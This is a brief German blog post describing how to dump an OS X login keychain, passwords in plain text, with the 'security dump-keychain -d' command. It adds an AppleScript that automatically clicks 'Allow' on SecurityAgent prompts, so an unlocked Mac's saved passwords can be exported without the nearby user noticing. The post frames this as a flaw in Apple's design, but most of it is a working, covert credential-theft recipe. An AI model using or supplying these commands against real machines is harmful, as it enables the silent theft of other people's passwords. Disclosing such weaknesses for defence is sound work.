Apple Keychain Export Sicherheits-lücke

Apple Keychain Export Sicherheits-lücke

Es existiert eine Methode, in OS X, die jedem Benutzer ermöglicht, seinen eigenen Schlüsselbund zu exportieren. Ohne sudo-Berechtigungen oder jede Systemdialoge , in eine Textdatei , in der Benutzernamen und Passwörter im Klartext angezeigt werden. Zum Zeitpunkt des Schreibens, funktioniert diese Methode in mindestens 10.10 und 10.11.5, und wahrscheinlich zumindest in allen Iterationen dazwischen. Dafür muss man nur den Terminal öffnen und folgen Befehl eingeben:

security dump-keychain -d login.keychain > keychain.txt

Somit kann jede Person, die Zugriff auf einen nicht gesperrten Mac hat, die gespeicherten Passwörter auslesen. In Zusammenhang mit einem kleinen Apple Script, dass die Systemabfragen mit ja bestätigt, wäre es sogar möglich, die Daten zu exportieren, ohne das der Anwender es sieht, wenn er daneben steht. Zumindest bei Anwendern, die den obigen Befehl nicht interpretieren können.

tell application "System Events"
    repeat while exists (processes where name is "SecurityAgent")
        tell process "SecurityAgent"
            click button "Allow" of group 1 of window 1
        end tell
        delay 0.2
    end repeat
end tell

Durch dieses kleine Script werden alle Meldungen vom SecurityAgent mit einer Verzögerung von 0,2 Sekunden mit Allow bestätigt.

Das kuriose daran ist, dass Apple über die UI einen Anwender nicht mal erlaubt ein Passwort anzuzeigen ohne ein Passwort einzugeben, aber über den Terminal darf man sich gleich alle Passwort exportieren ohne Passwort.

© teilzeitrebell.de Impressum